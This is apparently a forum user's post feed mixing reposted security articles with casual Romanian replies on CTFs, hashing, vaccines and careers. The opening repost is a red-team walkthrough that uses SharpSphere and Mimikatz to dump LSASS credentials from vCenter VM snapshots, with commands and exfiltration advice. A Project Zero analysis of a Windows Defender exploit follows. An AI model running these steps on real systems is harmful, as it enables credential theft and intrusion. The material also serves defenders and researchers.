Nytro

Dumping LSASS with SharpShere The dump function of SharpSphere allows operators to dump LSASS from any powered on VM managed by vCenter or ESXI, without needing to authenticate to the guest OS and without needing VMware Tools to be installed. This technique is not new and has been around for many years: https://danielsauder.com/2016/02/06/memdumps-volatility-mimikatz-vms-part-6-vmware-workstation/ https://web.archive.org/web/20210204072538/https://www.remkoweijnen.nl/blog/2013/11/25/dumping-passwords-in-a-vmware-vmem-file/ Although until now it’s been very difficult to leverage operationally. At its core, the process is: Authenticate to vCenter/ESXi Create a snapshot, with memory, of a powered on target VM Download the (often very large) .vmem and .vmsn files from the datastore Either run it through Volatility Or convert to .dmp with vmss2core and run it through WinDbg with Mimikatz Arguments Z:\>SharpSphere.exe dump --help SharpSphere 1.0.0.0 Copyright © 2020 --url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk --username Required. vCenter username, i.e. administrator@vsphere.local --password Required. vCenter password --targetvm Required. VM to snapshot --snapshot (Default: false) WARNING: Creates and then deletes a snapshot. If unset, SharpSphere will only extract memory from last existing snapshot, or none if no snapshots are available. --destination Required. Full path to the local directory where the file should be downloaded --help Display this help screen. --version Display version information. –snapshot By default, SharpSphere will not attempt to create a snapshot and will instead attempt to find valid .vmem and .vmsn files from an existing snapshot. This is preferrable from an OpSec perspective because there will be no evidence in the UI, however it’s obviously not guaranteed that a particular target VM has any snapshots, or whether these snapshots also captured the VM’s memory. If no existing snapshot exists then SharpSphere will exit. With --snapshot specified, SharpSphere will create a snapshot called System Backup [TIMESTAMP], download its associated ‘.vmem and .vmsn files, and then delete the snapshot once finished. Both the creation and deletion of the snapshot will be seen by other users in the Recent Tasks Window. It’s possible to attempt it without the --snapshot first to see if existing snapshots exist, and then repeat with --snapshot specified if none exist. –destination SharpSphere needs to download two files from the snapshot, a large .vmem file that is equal in size to the amount of RAM assigned to the machine (i.e. 4GB, 8GB, 16GB etc.), and a much smaller .vmsn file. It downloads these files to the directory specified by --destination on the executing machine. When running through Cobalt Strike’s execute-assembly this is obviously a directory on the beacon machine’s filesystem. This is an important distinction to make because it’s likely your target user is on an internal network and therefore the download should be relatively quick, as opposed to having to download these files over your beacon’s proxy. Once the two files are downloaded, SharpSphere adds both to a zip file with a random name and then deletes them. This makes the resultant file marginally easier to exfiltrate, for example during testing a 4GB .vmem file resulted in a 800MB zip. Instructions Execute SharpSphere with the following arguments (Hint: get the VM name with list? SharpSphere.exe dump --url https://[IP or FQDN]/sdk --username [USERNAME] --password [PASSWORD] --targetvm [NAME OF VM] --destination [LOCATION TO DOWNLOAD FILES] Example Output C:\Users\Administrator\Desktop>SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates [x] Creating vSphere API interface, takes a few minutes... [x] Connected to VMware vCenter Server 7.0.1 build-17005016 [x] Successfully authenticated [x] Finding existing snapshots for Windows 10... Error: No existing snapshots found for the VM Windows 10, recommend you try again with --snapshot set If no snapshots exist, repeat the same command and include --snapshot SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" --snapshot [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates [x] Creating vSphere API interface, takes a few minutes... [x] Connected to VMware vCenter Server 7.0.1 build-17005016 [x] Successfully authenticated [x] Creating snapshot for VM Windows 10... [x] Snapshot created successfully [x] Downloading Windows 10-Snapshot51.vmem (4096MB) to C:\Users\Public\z53dqmxx.5bz... [x] Downloading Windows 10-Snapshot51.vmsn to C:\Users\Public\hwu5gv2d.ezv... [x] Download complete, zipping up so it's easier to exfiltrate... [x] Zipping complete, download C:\Users\Public\cec0kwgk.b2m (916MB), rename to .zip, and follow instructions to use with Mimikatz [x] Deleting the snapshot we created If your C2 infrastructure and bandwidth supports it, download the resultant zip to your attacker controlled machine. Alternatively, and less OpSec-safe, upload the necessary tools to the beacon machine, with the understanding that these tools may be flagged as suspicious. The rest of the instructions assumes you’ve managed to get the file back to your machine. Rename the random file, in this instance cec0kwgk.b2m, to be a zip file and then extract the two files. The larger one is your .vmem file. Download vmss2core and provide it first with the smaller .vmsn file and then the larger .vmem file. If the target VM is Microsoft Windows 8/8.1, Windows Server 2012, Windows Server 2016 or Windows Server 2019 then execute with -W8: vmss2core-sb-8456865.exe -W8 hwu5gv2d.ezv z53dqmxx.5bz Otherwise use -W: vmss2core-sb-8456865.exe -W hwu5gv2d.ezv z53dqmxx.5bz Download WinDbg and load the resultant .dmp file that vmss2core generated as a Crash Dump. Download Mimikatz and load Mimilib.dll from within WinDbg .load C:\Tools\Mimikatz\x64\mimilib.dll Find the LSASS process !process 0 0 lsass.exe Switch to that process .process /r /p ffffc70462d020c0 Profit !mimikatz Written on February 26, 2021 Sursa: https://jamescoote.co.uk/Dumping-LSASS-with-SharpShere/

CVE-2021-1647: Windows Defender mpengine remote code execution Maddie Stone The Basics Disclosure or Patch Date: 12 January 2021 Product: Microsoft Windows Defender Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647 Affected Versions: Version 1.1.17600.5 and previous First Patched Version: Version 1.1.17700.4 Issue/Bug Report: N/A Patch CL: N/A Bug-Introducing CL: N/A Reporter(s): Anonymous The Code Proof-of-concept: Exploit sample: 6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788 Did you have access to the exploit sample when doing the analysis? Yes The Vulnerability Bug class: Heap buffer overflow Vulnerability details: There is a heap buffer overflow when Windows Defender (mpengine.dll) processes the section table when unpacking an ASProtect packed executable. Each section entry has two values: the virtual address and the size of the section. The code in CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects only checks if the next section entry's address is lower than the previous one, not if they are equal. This means that if you have a section table such as the one used in this exploit sample: [ (0,0), (0,0), (0x2000,0), (0x2000,0x3000) ], 0 bytes are allocated for the section at address 0x2000, but when it sees the next entry at 0x2000, it simply skips over it without exiting nor updating the size of the section. 0x3000 bytes will then be copied to that section during the decompression, leading to the heap buffer overflow. if ( next_sect_addr > sect_addr )// current va is greater than prev (not also eq) { sect_addr = next_sect_addr; sect_sz = (next_sect_sz + 0xFFF) & 0xFFFFF000; } // if next_sect_addr <= sect_addr we continue on to next entry in the table [...] new_sect_alloc = operator new[](sect_sz + sect_addr);// allocate new section [...] Patch analysis: There are quite a few changes to the function CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects between version 1.1.17600.5 (vulnerable) and 1.1.17700.4 (patched). The directly related change was to add an else branch to the comparison so that if any entry in the section array has an address less than or equal to the previous entry, the code will error out and exit rather than continuing to decompress. Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.): It seems possible that this vulnerability was found through fuzzing or manual code review. If the ASProtect unpacking code was included from an external library, that would have made the process of finding this vulnerability even more straightforward for both fuzzing & review. (Historical/present/future) context of bug: The Exploit (The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.) Exploit strategy (or strategies): The heap buffer overflow is used to overwrite the data in an object stored as the first field in the lfind_switch object which is allocated in the lfind_switch::switch_out function. The two fields that were overwritten in the object pointed to by the lfind_switch object are used as indices in lfind_switch::switch_in. Due to no bounds checking on these indices, another out-of-bounds write can occur. The out of bounds write in step 2 performs an or operation on the field in the VMM_context_t struct (the virtual memory manager within Windows Defender) that stores the length of a table that tracks the virtual mapped pages. This field usually equals the number of pages mapped * 2. By performing the 'or' operations, the value in the that field is increased (for example from 0x0000000C to 0x0003030c. When it's increased, it allows for an additional out-of-bounds read & write, used for modifying the memory management struct to allow for arbitrary r/w. Exploit flow: The exploit uses "primitive bootstrapping" to to use the original buffer overflow to cause two additional out-of-bounds writes to ultimately gain arbitrary read/write. Known cases of the same exploit flow: Unknown. Part of an exploit chain? Unknown. The Next Steps Variant analysis Areas/approach for variant analysis (and why): Review ASProtect unpacker for additional parsing bugs. Review and/or fuzz other unpacking code for parsing and memory issues. Found variants: N/A Structural improvements What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.? Ideas to kill the bug class: Building mpengine.dll with ASAN enabled should allow for this bug class to be caught. Open sourcing unpackers could allow more folks to find issues in this code, which could potentially detect issues like this more readily. Ideas to mitigate the exploit flow: Adding bounds checking to anywhere indices are used. For example, if there had been bounds checking when using indices in lfind_switch::switch_in, it would have prevented the 2nd out-of-bounds write which allowed this exploit to modify the VMM_context_t structure. Other potential improvements: It appears that by default the Windows Defender emulator runs outside of a sandbox. In 2018, there was this article that Windows Defender Antivirus can now run in a sandbox. The article states that when sandboxing is enabled, you will see a content process MsMpEngCp.exe running in addition to MsMpEng.exe. By default, on Windows 10 machines, I only see MsMpEng.exe running as SYSTEM. Sandboxing the anti-malware emulator by default, would make this vulnerability more difficult to exploit because a sandbox escape would then be required in addition to this vulnerability. 0-day detection methods What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day? Detecting these types of 0-days will be difficult due to the sample simply dropping a new file with the characteristics to trigger the vulnerability, such as a section table that includes the same virtual address twice. The exploit method also did not require anything that especially stands out. Other References February 2021: 浅析 CVE-2021-1647 的漏洞利用技巧("Analysis of CVE-2021-1647 vulnerability exploitation techniques") by Threatbook Sursa: https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1647.html

Nu uitati, weekend, CTF, premii! https://ctf.rstforums.com/ Daca mai poate cineva contribui cu exercitii, nu foarte dificile, e perfect.

Eu m-am programat la Romexpo cand mai erau 3000 pe lista de asteptare. Si cred ca dupa vreo 2 saptamani m-am putut programa.

Nu ma pregatesc sa dau niciun ordin, minti lumea pe fata. Cat despre dat burta jos, tot incerc dar nu imi iese... Poate cei care dau ordinul imi dau si niste sfaturi ca sa scap de burta.

Salut, SHA256/SHA512 etc nu se pot inversa pentru ca sunt algoritmi de hashing. De exemplu, un hash sha256 pentru textul "Gigel" va fi 38810d5f65b12d1433aaff068818bc1f298a322b2a45a8f335645c8fe3af3510 Un hash pentru "Gigel se duce la plimbare si vede o fata de care se indragosteste apoi uita de ea cand vede un Lamborghini si gaseste 10 RON pe jos" va avea urmatorul hash: 299c91444f0f7f8ee3cf12ffc4a9483bc1caf5f43f68b0593b1dddd84a0b44be Dupa cum vezi, indiferent de lungimea textului, lungimea hash-ului este aceeasi. Chiar daca textul (sau binarul) are 1KB sau 2 TB, un hash va avea aceeasi lungime si va fi mereu acelasi pentru acelasi input. De aceea sunt folosite pentru a nu stoca parolele in plain-text in baza de date. Ca sa luam un exemplu mai simplu: CNP. Acesta contine sexul, data nasterii, judetul ... iar ultima cifra este o "suma de control". Algoritmul exact este descris aici: https://ro.wikipedia.org/wiki/Cod_numeric_personal_(România) - asa se calculeaza acea ultima cifra. Dar sa luam un exemplu mai simplu, sa zicem ca pentru CNP 1881111111116 suma de control este cifra "6" de la final si ca se calculeaza doar adunand cifrele si scotand restul impartirii la 10 (%10 adica). Un hash, ca idee, e ceva asemanator. Un hash reprezinta de fapt acel "6" de la final. Poti din acel 6 sa deduci CNP-ul? E destul de clar ca nu. Singurul lucru care se poate face pe hash-uri e bruteforce, care poate fi optimizat din cauza unor "probleme" in algoritmul hash-urilor. Adica sa incerci a faci hash din orice combinatii de text: aaaaaa, aaaaab, aaaaac etc pana ajungi la hash-ul dorit. Discutia se poate prelungi.

CRYPTOGRAPHY CHEAT SHEET FOR BEGINNERS 1 What is cryptography? Cryptography is a collection of techniques for: concealing data transmitted over insecure channels validating message integrity and authenticity 2 Some cryptographic terms plaintext – a message or other data in readable form ciphertext – a message concealed for transmission or storage encryption – transforming plaintext into ciphertext decryption – transforming ciphertext back into plaintext key – an input to an encryption or decryption algorithm that determines the specific transformation applied hash – the output of an algorithm that produces a fixed N-bit output from any input of any size entropy – the number of possible states of a system, or the number of bits in the shortest possible description of a quantity of data. This may be less than the size of the data if it is highly redundant. 3 Basic cryptographic algorithms 3.1 symmetric ciphers A symmetric cipher uses the same key for encryption and decryption. In semi-mathematical terms, encryption: ciphertext = E(plaintext, key) decryption: plaintext = D(ciphertext, key) Two parties that want to communicate via encryption must agree on a particular key to use, and sharing and protecting that key is often the most difficult part of protecting encryption security. The number of possible keys should be large enough that a third party can’t feasibly try all of the keys (“brute-forcing”) to see if one of them decrypts a message. 3.2 block ciphers A block cipher works on fixed-size units of plaintext to produce (usually) identically-sized units of ciphertext, or vice-versa. Example block ciphers: DES (the former Data Encryption Standard) with a 64-bit block and 56-bit keys, now obsolete because both the block size and key size are too small and allow for easy brute-forcing) AES (Advanced Encryption Standard, formerly known as Rijndael) with 128-bit blocks and keys of 128, 192, or 256 bits 3.3 stream ciphers A stream cipher produces a stream of random bits based on a key that can be combined (usually using XOR) with data for encryption or decryption. Example stream ciphers: Chacha20 RC4 (now considered too weak to use) 3.4 public-key (or asymmetric) ciphers A public-key cipher has two complementary keys K1 and K2 such that one can reverse what the other one does, or in symbolic terms: ciphertext = E(plaintext, K1) or E(plaintext, K2) plaintext = D(ciphertext, K2) or D(plaintext, K1) Unlike a symmetric cipher, where the key must be kept secret between parties at all times, a public-key algorithm allows one (but only one!) of the keys to be revealed in public, making it possible to send encrypted messages without having previously arranged to share a key. Example public-key algorithms: RSA (from the initials of its creators Rivest, Shamir, Adelman) based on modular arithmetic using large prime numbers and the difficulty of factoring large numbers. At this time 2048-bit primes are considered necessary to create secure RSA keys (factorization of keys based on 512-bit primes has already been demonstrated and 1024-bit keys appear feasible) Elliptic Curve algorithms based on integers and modular arithmetic satisfying an equation of the form y^2 = x^3 + a*x + b. Elliptic curve keys can be much shorter (256-bit EC keys are considered roughly equivalent to 3072-bit RSA keys). However, public-key algorithms are much (hundreds to thousands) of times slower than symmetric algorithms, making it expensive to send large amounts of data using only public-key encryption. However, public-key algorithms do provide a secure way to transmit symmetric cipher keys. 3.5 Diffie-Hellman key exchange An algorithm that allows two parties to create a shared secret through a public exchange from which an eavesdropper cannot feasibly infer the secret. Useful for establishing a shared symmetric key for encrypted communication. Diffie-Hellman can be peformed using either modular arithmetic with large prime numbers or with elliptic-curve fields. Diffie-Hellman is also usually the basis of “forward secrecy”. One method of key exchange possible in SSL/TLS is simply using a public-key algorithm to send a key between a client and a server. However, if the private key of that SSL/TLS certificate is later exposed, someone who monitored and recorded session traffic could decrypt all the keys used in the sessions they recorded. Forward secrecy not only involves setting up unique, random session keys for each communication session, but also using an algorithm like Diffie-Hellman which establishes those keys in a way that is inaccessible to an eavesdropper. 3.6 hash algorithms A hash (or cryptographic checksum) reduces input data (of any size) to a fixed-size N-bit value. In particular for cryptographic use a hash has these properties: two different inputs are very unlikely to produce the same hash (“collision”). it should be very difficult to find another input that produces any specified hash value (“preimage”) even a one-bit change in the input should produce a hash that is different in about N/2 bits Note that because the possible number of inputs to a hash function is much larger than the hash function output, there is always some small probability of collision or of finding a preimage. In the ideal case an N-bit hash has a 2^-(N/2) probability of collision for two randomly-chosen large inputs (look up the “birthday problem” for why it is N/2 and not N), and a 2^-N probability of a random input producing a specified hash value. Example hash algorithms: MD5 produces a 128-bit hash from its input. It has demonstrated collisions and feasible preimage computation and should not be used. SHA1 produces 160-bit hashes but has at least one demonstrated collision and is also deprecated for cryptographic use (however, it is still used in git because it is still workable as a hash function). SHA-256 produces 256-bit hashes. SHA-224 is basically a SHA-256 hash truncated to 224 bits. Similarly, SHA-512 produces a 512-bit hash and SHA-384 truncates a SHA-512 hash to 384 bits. 3.7 cryptographic random number generators Many cryptographic methods require producing random numbers (such as for generating unique keys or identifiers). Traditional pseudo-random number generators produce output that can be highly predictable, as well as often starting from known states and having relatively small periods (such as 2^32). A cryptographic random number generator must make it very difficult to determine the prior (or future) state of the generator from its current output, as well as have enough entropy to generate sufficiently large random numbers. Once the Debian maintainers made a seemingly innocuous patch to the OpenSSL random number generator initialization. The unintended consequence was that it effectively seeded the generator with only about 16 bits of entropy, meaning that in particular ssh-keygen generated only about 2^16 possible 2048-bit SSH host keys when it really should have been capable of generating over 2^2000. Once this was discovered and patched a lot of people had to change their host keys (or risk “man-in-the middle” impersonation attacks). Finding useful random input to make a cryptographic random number generator truly unpredictable can be difficult. Many systems attempt to collect physically random input (such as timing of disk I/O, network packets, or keyboard input) that is “mixed” into existing random state using a cipher or cryptographic hash. 4 Cryptographic Protocols The algorithms described above are building blocks for methods of secure communication. A particular combination of these basic algorithms applied in a particular way is a cryptographic protocol. 4.1 cipher modes The simplest thing you can do with a block cipher is break plaintext up into blocks, then encrypt each block with your chosen key (also called ECB for “Electronic Code Book”, by analogy with codes that simply substituted code words). Unfortunately this leads to a weakness: if you a particular plaintext block is repeated in the input the ciphertext block also repeats in the output. This can easily happen in English text if a phrase just happens to line up with a block the same way more than once. There are other ways to use block ciphers to avoid this. The simplest is CBC or “Cipher Block Chaining” where the previous ciphertext block is XORed with the current plaintext block before encrypting it. This is reversible by decrypting a ciphertext block, then XORing the previous ciphertext block with that to recover the plaintext. There are other modes like OFB (“Output FeedBack”) that combine ciphertext and plaintext in more complicated but reversible ways so that repeated plaintext blocks won’t result in repeated ciphertext blocks. These modes also often depend on an “initialization vector” which is typically some cryptograpically random value that makes the initial state of the encryption unpredictable to an outside observer. 4.2 message signing Someone who has created a public key pair (K1, K2) and published a public key (let’s say that’s K2) can encrypt a message using their private key K1, and anyone can validate that the message came from that sender by decrypting it with the public key K2. Due to the much higher computational cost of encrypting data with public-key algorithms, usually the signer actually encrypts only a cryptographic hash of the original message. A sender can also send a plaintext message along with a signature created with their private key if the privacy of the message is not important but validating the identity of the sender is. Message signing is also the basis of SSL/TLS certificate validation. A certificate contains a public key and a signature of that key generated with the private key of a trusted certificate authority. An SSL/TLS client (such as a web browser) can confirm the authenticity of the public key by validating the certificate signature using the public key of the certificate authority that signed it. An SSL/TLS client can validate the identity of a server by encrypting a large random number with the public key in the server certificate. If the server can decrypt the random number with its private key and return it, the client can assume the server is what it says it is. “Self-signed” certificates are merely public keys signed with the corresponding private key. This isn’t as trustworthy (assuming you have reasons to trust a certificate authority) but also doesn’t require interaction with a certificate authority. However, ultimately the buck has to stop somewhere and even certificate authority “root certificates” are self-signed. Rather than the centralized certificate authority model (where certain authorities are trusted to sign certificates) email encryption tools like GPG have a “web of trust” model where someone’s public key can be signed by many other individuals or entities, so that if you trust at least some of those others it gives you greater assurance that a public key is valid and belongs to the indicated person. Without any such signatures, someone could presumably publish a key purporting to be someone else and there’d be no easy way to validate it. 4.3 secure email If you want people to be able to send you secure email (such as with PGP, GPG, or S/MIME) you create a public key pair (K1, K2) and publish the public key K2. Someone who wants to send you mail picks a cipher and generates a unique, random key for that cipher. They encrypt their plaintext message with that cipher and key and encrypt the key with your public key, and send you a message containing the ciphertext, the cipher algorithm they used, and the encrypted cipher key. You can decrypt the cipher key with your private key, and then decrypt their message from the ciphertext and indicated cipher. Note that for this model to work everyone who wants to receive encrypted email has to publish a public key. 4.4 SSL/TLS SSL (Secure Sockets Layer, now deprecated) and TLS (Transport Layer Security) use all of the above cryptographic primitives to secure data sent over a network. As a result the protocol is rather complicated, but in summary does these things: client and server agree on a “cipher suite” to use, which consists of: a method for key exchange (via the public/private key pair in a certificate or Diffie=Hellman key exchange) a method for server validation (based on the public-key algorithm used in its certificate) a symmetric cipher for bulk data encryption a hash algorithm to use for message authentication, actually an HMAC or “Hashed Message Authentication Code” that hashes a combination of a secret key and the data) establish random shared key for the symmetric cipher and HMAC using the specified key exchange method transmits data using the specified symmetric cipher and HMAC algorithms 5 Cryptanalysis Cryptanalysis is the study of weaknesses in cryptographic algorithms and protocols. In general, good algorithms and protocols have been subjected to lots of public cryptanalysis that has not resulted in attacks that are significantly better than brute-force. It’s a complex topic, and this is a pretty good introduction: https://research.checkpoint.com/cryptographic-attacks-a-guide-for-the-perplexed 6 Cryptographic tools 6.1 OpenSSL Although it’s taken a lot of heat for some of its previous security issues (particularly “Heartbleed”), it’s still the most widely used cryptographic library because of its portability and completeness. The openssl command-line utility also provideas a lot of useful functionality. It can be used to create certificate requests or even to sign certificates, encrypt/decrypt files, transform several kinds of file formats used for cryptographic data, and more. Of particular use is the openssl s_client command which can initiate an SSL/TLS client connection, but more importantly shows a lot of useful debugging data about the protocol negotiation including the certificate and cipher suite properties. 6.2 gnutls The GNU Project’s SSL/TLS library, which includes a gnutls-cli utility with similar (but less extensive) functionality for SSL/TLS client connections and encryption/decryption. 6.3 gnupg Primarily intended for encrypting or decrypting secure mail messages, it also provides some functionality for encrypting or decrypting files and creating or validating signatures. 7 General cryptographic advice 7.1 Use established, publicly analyzed algorithms and tools Schneier’s Law: “Anyone can create an algorithm that they can’t break.” https://www.schneier.com/blog/archives/2011/04/schneiers_law.html Resist the urge to create and use your own cryptographic algorithms and protocols. Cryptography is hard and even expert cryptographers have created methods that, once exposed to public analysis, have turned out to be easy to break. 7.2 Zealously protect keys and credentials Often the easiest way to break a cryptographic system is to find the keys being used. This may be easier than you think. What if you left that certificate private key in a publicly-readable file? What if it’s copied into backups that are available to other untrusted users? Think carefully about how you handle and store that kind of sensitive material. Sursa: https://cybercoastal.com/cryptography-cheat-sheet-for-beginners/

Pff, ai scos layer-ul pe care l-am pus in Photoshop Microsoft Power!

Salut, nu ai ce face cu un botnet, sugestia noastra e sa iti gasesti ceva mai util de facut. Nu mai suntem prin anii 2000, haideti sa evoluam si noi.

Gata, sunt vaccinat cu prima doza. Abia am simtit cand mi-au facut vaccinul. Nu am putut sa fac poza/filmez ca doamna de acolo nu a fost de acord si nu am insistat. A fost totul OK pana am plecat de acolo, apoi am crezut ca nu mai ajung in viata acasa... Conducea tipul de pe Uber de parca era la raliu. Stiam eu ca vaccinul ii afecteaza si pe cei din jur! Nu am avut febra sau alte simptome dupa, deloc. Doar o mica durere la locul injectarii cand apasam pe zona.

Cel mai probabil trebuie sa prinzi pachetele care cu (SRC IP: al tau si DST PORT 80) + (DST IP: al tau si SRC PORT 80), adica request-urile si response-urile. Cred ca e deajuns daca cauti pachetele pe portul 80 (si src si dst). Intra in browser si scrie http://blabla.com - sa pui acel http inainte, ca sa fortezi traficul pe http. Si ar trebui sa apara, doar sa te asiguri ca sniffing-ul se face pe interfata corecta (eth0 sau ce o fi).

Salut, nu stiu daca am inteles unde ai probleme, mi se pare ca esti pe drumul cel bun.

Exemplu https://portswigger.net/support/configuring-an-android-device-to-work-with-burp

Da, mai am un prieten care a avut simptome similare. PS: Nu face "submarin" (shot pus in halba) cu bere si gin, e crunt.

Saptamana asta ma vaccinez. O sa fie Pfizer. Nu am stiut asta cand am ales centrul, dar de ceva timp, pe harta cu centrele, apare si vaccinul care se foloseste in fiecare centru de vaccinare. Incerc sa fac poza cand ma vaccinez.

Sincer, in loc sa te chinui asa, vorbeste frumos cu tanti aia si convinge-o ca ea oricum plateste netul si ca nu are nimic de pierdut ca il folosesti.

Salut, o mica problema, cei care mi-au trimis donatii sa imi dea PM in care sa imi zica numele cu care au trimis. Ideea e ca nu stiu exact care useri au trimis, vreau sa postez lista de useri care au donat, nu numele lor. Datele CTF: 17-18 aprilie Categorie: Incepatori Tip: Individual Premii: 3500 RON+ Platforma are inregistrarile deschise: https://ctf.rstforums.com/ Daca sunt persoane care pot ajuta cu exercitii, nu foarte dificile, astept PM.

Sunt programat saptamana asta. Sper sa pot face poza/video. De unde ai scos tu procentul de 50%? Suna a Antena3/Romania TV/Realitatea sau chiar ortodoxinfo. Tocmai am intrat pe mizeria aia de site, ai nevoie de maxim 2 clase ca sa citesti ce scrie acolo. Ar trebui sa iti alegi si tu niste surse de informare mai bune sau sa discuti cu niste medici. Da un telefon la medicul de familie si vezi ce zice macar. Banuiesc ca nu ai prieteni mai educati cu care sa discuti, sau doctori. Eu cunosc si doctori si s-au vaccinat si ei si familiile lor si recomanda tuturor sa faca asta. Dar tot nu aduci argumente. Argumente. Stii ce zic? Adica nu idei idioate, fara nicio baza reala. Trebuie sa crezi ce zic, eu sunt la conducerea Noii Ordini Mondiale. Daca nu crezi, demonstreaza ca nu sunt.

Salut, nu ar fi o mutare rea, cererea de persoane in domeniu e in crestere, inclusiv in Romania. Interviurile contin tot felul de intrebari, atat generale de security din orice ramura a acesteia, cat mai ales din ce are nevoie fiecare firma in parte. Cele mai multe firme cred ca lucreaza cu aplicatii web si acolo sunt necesare cunostiinte detaliate de vulnerabilitati web. Nu stiu cat de mult ajuta un master, cel putin in tara. E bine sa il ai daca nu te incurca cu nimic, daca doar mergi acolo din cand in cand si la examene. Cam asa e cu partea de security, job-uri pe parte de defensive, de analiza de atacuri, SOC (Security Operations Center) si altele unde ajuta cunostiintele de administrator de sistem si parte de offensive unde skill-urile necesara sunt putin diferite, dar nu cu mult - putina programare ajuta aici, destul de mult, protocoale si multe altele.

SUSPECTE. Daca cineva se vaccineaza si ulterior moare, din orice fel de conditie medicala, se ia in considerare si vaccinul. Asta nu inseamna ca vaccinul e de vina. "99 circumstanțe sociale incl. 2 decese 138 Proceduri chirurgicale și medicale incl. 4 decese 1.977 Tulburări oculare incl. 1 moarte 2.676 Tulburări de metabolism și nutriție incl. 5 decese" Sunt cateva exemple. Totusi, vaccinul asta e super-criminal daca ucide din tot felul de astfel de motive. Apoi: - 4000 de decese POSIBIL (desi slabe sanse) - 138 de MILIOANE de vaccinari - Decese Covid-19 - 2.84 MILIOANE Covid: Cases 130M 130,000,000 Recovered 73.9M 73,900,000 Deaths 2.84M 2,840,000 Adica, pe scurt, pentru cei care nu stiu sa citeasca: - 130 de milioane de cazuri de Covid rezulta in 2,84 MILIOANE de morti. Adica 2840000. - 130 de milioane de vaccinari anti-covid rezulta in POATE 4000 de morti. Adica 4000. Hai sa nu ne vaccinam, nu? Multi oameni fara simt elementar de logica. Va meritati soarta.

Salut, nu poti sa il decriptezi pentru ca nu e criptat. E probabil un format binar, acei bytes in hex au ceva insemnatate. E dificil sa faci "reversing" pe un astfel de text, poti sa deduci anumite lucruri, dar complet e foarte greu. O solutie ar fi sa stii ce program in genereaza si reverse engineering pe el ar trebui sa spuna cam ce contine fisierul.

Nu e o prostie, o sa iti dovedesc, iti dau un link prin care sa te inregistrezi. Si va puteti inregistra toti, o sa ploua cu bani pe voi!!! PS: Glumesc, evident Da, nu am idee daca se poate face ceva. Nu stiu daca incalca ceva legi si nici ce s-ar putea face in aceasta privinta, desi e o forma de inselaciune. Pana la urma, Darwin stia ce zice.

Cica documentul ar fi semnat de anumiti medici doar ca ei nu stiu ca au facut asta. Penibil, fake news De fapt textul se vede ca e scris de o Karen pe WC, nu de medici.

Poate asta: https://chrome.google.com/webstore/detail/tweetbot-marketing-bot-fo/lnafpokcmhignpnlaphmibphikenilin?hl=en

Optiunea 1: Instaleaza o masina virtuala cu Linux: gratuit Optiunea 2: Cumpara un VPS de la DigitalOcean sau Vultr: 5$ pe luna